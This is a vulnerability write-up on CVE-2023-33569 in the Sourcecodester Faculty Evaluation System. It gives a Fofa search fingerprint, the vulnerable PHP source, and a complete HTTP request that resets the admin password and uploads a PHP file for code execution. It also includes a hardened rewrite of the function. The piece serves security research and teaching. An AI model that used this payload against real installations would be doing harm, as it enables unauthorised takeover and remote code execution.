[星悦安全]-2023-7-14-Sourcecodeste Faculty Evaluation System v1.0 Rce(CVE-2023-33569).md

File metadata and controls

181 lines (125 loc) · 5.67 KB

Sourcecodester Faculty Evaluation System v1.0 RCE (CVE-2023-33569)

Original by Swimt, 星悦安全


0x00 Preface

Fofa: "assets/dist/css/jquery.datetimepicker.min.css"

Source download: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

This is a panel-style system; after reading the code, all I can say is that it is hard to put into words..... The interface looks like this

0x01 Unauthenticated arbitrary admin password reset + file upload vulnerability

Let's first look at ajax.php, which calls the update_user method:

```php
<?php
ob_start();
date_default_timezone_set("Asia/Manila");
$action = $_GET['action'];            // action is taken from the GET request
include 'admin_class.php';            // include admin_class.php
$crud = new Action();
// other irrelevant code omitted......
...
if($action == 'update_user'){
	$save = $crud->update_user();
	if($save)
		echo $save;
...
```

Following it into admin_class.php, let's look at update_user. It updates the administrator's record directly and uploads a file along the way, and the access control is as good as nonexistent...

```php
	function update_user(){
		extract($_POST);
		$data = "";
		$type = array("","users","faculty_list","student_list");
		foreach($_POST as $k => $v){
			if(!in_array($k, array('id','cpass','table','password')) && !is_numeric($k)){

				if(empty($data)){
					$data .= " $k='$v' ";
				}else{
					$data .= ", $k='$v' ";
				}
			}
		}
		$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
		if($check > 0){
			return 2;
			exit;
		}
		if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){
			$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
			$move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
			$data .= ", avatar = '$fname' ";

		}
		if(!empty($password))
			$data .= " ,password=md5('$password') ";
		if(empty($id)){
			$save = $this->db->query("INSERT INTO {$type[$_SESSION['login_type']]} set $data");
		}else{
			echo "UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id";
			$save = $this->db->query("UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id");
		}

		if($save){
			foreach ($_POST as $key => $value) {
				if($key != 'password' && !is_numeric($key))
					$_SESSION['login_'.$key] = $value;
			}
			if(isset($_FILES['img']) && !empty($_FILES['img']['tmp_name']))
					$_SESSION['login_avatar'] = $fname;
			return 1;
		}
	}
```

If it succeeds it returns 1. In the middle there is also a line that checks the email, but it is not a real obstacle:

```php
$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
```

Payload:

```http
POST /eval/ajax.php?action=update_user HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/eval/index.php?page=report
Content-Length: 737
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close

-----------------------------166782539326470
Content-Disposition: form-data; name="id"

1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"

a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"

admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"

admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------166782539326470--
```

**What if the upload path is not shown? Just log in to the back end and look:** admin@admin.com|admin, since the password has already been changed...

The file actually ends up here: /assets/uploads/&lt;timestamp&gt;_filename.php
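For contrast, here is a hardened update_user() for the same ajax.php?action=update_user flow. This is an added example, not the project's code, and it assumes the original's session keys ($_SESSION['login_id'], $_SESSION['login_type']), its table names, the columns firstname/lastname/email/password/avatar, and a mysqli handle in $this->db.

```php
<?php
// Added example, not the project's code: hardened update_user() for the same flow.
// Assumes $_SESSION['login_id'] / $_SESSION['login_type'] are set at login, the
// original's table names and columns, and that $this->db is a mysqli connection.
class Action {
    public $db;
    function update_user(){
        // 1. Authentication: the original never looked at the session at all.
        if (empty($_SESSION['login_id']) || empty($_SESSION['login_type'])) {
            http_response_code(403);
            return 0;
        }
        $type  = array("", "users", "faculty_list", "student_list");
        $table = isset($type[(int)$_SESSION['login_type']]) ? $type[(int)$_SESSION['login_type']] : '';
        if ($table === '') { return 0; }
        // 2. Authorization: the row id comes from the session, never from POST.
        $id = (int)$_SESSION['login_id'];
        // 3. Column allow-list with bound parameters instead of extract($_POST)
        //    glued into "UPDATE ... set $data".
        $cols = array(); $vals = array(); $types = '';
        foreach (array('firstname', 'lastname', 'email') as $col) {
            if (isset($_POST[$col])) {
                $cols[] = "$col = ?"; $vals[] = (string)$_POST[$col]; $types .= 's';
            }
        }
        if (!empty($_POST['password'])) {
            $cols[] = "password = ?";
            $vals[] = password_hash($_POST['password'], PASSWORD_DEFAULT); // not md5()
            $types .= 's';
        }
        // 4. Upload: extension + sniffed MIME allow-list, server-chosen file name.
        if (isset($_FILES['img']) && $_FILES['img']['error'] === UPLOAD_ERR_OK) {
            $ok   = array('jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png');
            $ext  = strtolower(pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION));
            $mime = (new finfo(FILEINFO_MIME_TYPE))->file($_FILES['img']['tmp_name']);
            if (!isset($ok[$ext]) || $ok[$ext] !== $mime) { return 0; }
            $fname = bin2hex(random_bytes(16)) . '.' . $ext;
            if (!move_uploaded_file($_FILES['img']['tmp_name'], 'assets/uploads/' . $fname)) { return 0; }
            $cols[] = "avatar = ?"; $vals[] = $fname; $types .= 's';
        }
        if (empty($cols)) { return 0; }
        // 5. $table comes from the fixed array and every value is bound.
        $vals[] = $id; $types .= 'i';
        $stmt = $this->db->prepare("UPDATE $table SET " . implode(', ', $cols) . " WHERE id = ?");
        $stmt->bind_param($types, ...$vals);
        return $stmt->execute() ? 1 : 0;
    }
}
```

Pair this with a web-server rule that serves assets/uploads/ as static files only, so that a file which slips past the allow-list still cannot execute.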

Disclaimer:

The programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this public account assume no legal or joint liability. Please be aware!!!
